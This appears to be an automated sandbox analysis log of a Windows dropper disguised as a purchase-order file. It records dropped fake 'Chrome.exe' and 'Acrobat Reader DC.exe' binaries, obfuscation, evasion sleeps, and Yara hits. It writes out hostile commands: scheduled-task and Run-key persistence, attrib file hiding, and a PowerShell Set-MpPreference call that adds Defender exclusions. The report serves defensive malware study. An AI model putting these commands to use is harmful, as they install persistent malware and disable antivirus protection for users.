                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe File created: C:\Users\user~1\AppData\Local\Temp\autB0AA.tmp
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe Code function: 10_2_00433EE0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,10_2_00433EE0
                        Source: NRHRAS.exe.0.dr, ?????????????/??????????????.cs Base64 encoded string
                        Source: NRHRAS.exe.0.dr, ?????????????/?????????????.cs Base64 encoded string
                        Source: Chrome.exe.1.dr, ?????????????/?????????????.cs Base64 encoded string
                        Source: Chrome.exe.1.dr, ?????????????/??????????????.cs Base64 encoded string
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/?????????????.cs Base64 encoded string
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/??????????????.cs Base64 encoded string
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_01
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_01
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2028:120:WilError_01
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4220:120:WilError_01
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe Mutant created: \Sessions\1\BaseNamedObjects\S500Mutex_YMXBWEGOQS
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3420:120:WilError_01
                        Source: NRHRAS.exe.0.dr, ?????????????/???????????.cs Cryptographic APIs: 'CreateDecryptor'
                        Source: Chrome.exe.1.dr, ?????????????/???????????.cs Cryptographic APIs: 'CreateDecryptor'
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/???????????.cs Cryptographic APIs: 'CreateDecryptor'
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe Static file information: File size 1382294 > 1048576

                        Data Obfuscation

                        Source: NRHRAS.exe.0.dr, ?????????????/???????????.cs .Net Code: ?????????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: Chrome.exe.1.dr, ?????????????/???????????.cs .Net Code: ?????????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/???????????.cs .Net Code: ?????????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe Code function: 10_2_00416CB5 push ecx; ret 10_2_00416CC8
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe Code function: 12_2_00416CB5 push ecx; ret 12_2_00416CC8
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe Code function: 10_2_0040EBD0 LoadLibraryA,GetProcAddress,10_2_0040EBD0
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe Static PE information: real checksum: 0xa961f should be: 0x1580b2
                        Source: Acrobat Reader DC.exe.0.dr Static PE information: real checksum: 0xa961f should be: 0x1580b2
                        Source: NRHRAS.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x1bd48
                        Source: Chrome.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x1bd48

                        Persistence and Installation Behavior

                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe Process created: attrib.exe
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe File created: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe File created: C:\Users\user\AppData\Local\Temp\NRHRAS.exe
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe File created: C:\Users\user\AppData\Roaming\Stub\Chrome.exe

                        Boot Survival

                        Source: Yara match File source: 1.2.NRHRAS.exe.2cda580.1.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 1.0.NRHRAS.exe.2f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 1.2.NRHRAS.exe.2cda580.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: NRHRAS.exe PID: 5576, type: MEMORYSTR
                        Source: Yara match File source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, type: DROPPED
                        Source: Yara match File source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULL
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UALDJT
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UALDJT.lnk
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe Code function: 10_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00434418
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe Code function: 12_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00434418
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.NRHRAS.exe.2f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NRHRAS.exe PID: 5576, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe TID: 5992Thread sleep count: 500 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe TID: 3024Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe TID: 4196Thread sleep count: 33 > 30
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe TID: 4196Thread sleep time: -99000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4908Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_10-28023
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeThread sleep count: Count: 1533 delay: -10Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_10-26736
                        Source: Yara matchFile source: 00000005.00000002.634250998.00000000030A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.640455808.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.633552399.0000000003088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5860, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\UALDJT.vbs, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeWindow / User API: threadDelayed 1533Jump to behavior
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeWindow / User API: foregroundWindowGot 718Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeWindow / User API: threadDelayed 500Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9459
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeAPI coverage: 5.9 %
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeAPI coverage: 5.5 %
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeAPI call chain: ExitProcess graph end nodegraph_10-26737
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeAPI call chain: ExitProcess graph end nodegraph_12-27589
                        Source: Acrobat Reader DC.exe, 0000000A.00000002.288878742.0000000000BAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_0040E500
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00442886
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,10_2_004339B6
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00431A86
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00442886
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,12_2_004339B6
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00431A86
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,12_2_0044BD27
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0044BF8B
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040EBD0 LoadLibraryA,GetProcAddress,10_2_0040EBD0
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,10_2_0040D590
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,10_2_004238DA
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0041A208
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00417DAA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00417DAA
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0041A208
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00417DAA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00417DAA
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00434418
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe Process created: C:\Users\user\AppData\Local\Temp\NRHRAS.exe "C:\Users\user\AppData\Local\Temp\NRHRAS.exe"
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe Process created: C:\Windows\System32\attrib.exe C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe Process created: C:\Windows\System32\attrib.exe C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub\Chrome.exe
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat""
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Stub\Chrome.exe "C:\Users\user\AppData\Roaming\Stub\Chrome.exe"
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00436CD7 LogonUserW,10_2_00436CD7
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,10_2_0040D590
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,10_2_0043333C
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00446124 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00446124
                        Source: Acrobat Reader DC.exeBinary or memory string: Shell_TrayWnd
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe, 00000000.00000003.243123482.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe, 00000000.00000003.240362884.0000000004300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\NRHRAS.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Stub\Chrome.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
